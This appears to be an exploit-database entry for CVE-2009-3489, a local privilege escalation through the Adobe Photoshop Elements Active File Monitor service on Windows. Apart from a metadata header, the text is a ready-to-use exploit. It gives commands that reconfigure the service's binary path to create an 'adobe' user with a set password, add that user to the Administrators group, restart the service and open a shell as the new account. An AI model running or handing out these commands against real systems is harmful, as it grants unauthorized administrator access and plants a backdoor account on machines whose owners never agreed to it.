Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation

Author: bellick
type: local
platform: windows
port: 
date_added: 2009-10-28  
date_updated:   
verified: 1  
codes: CVE-2009-3489;OSVDB-58418  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9988.txt  

To exploit this issue, attackers require local, interactive access to an affected computer.

The following example commands are available:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd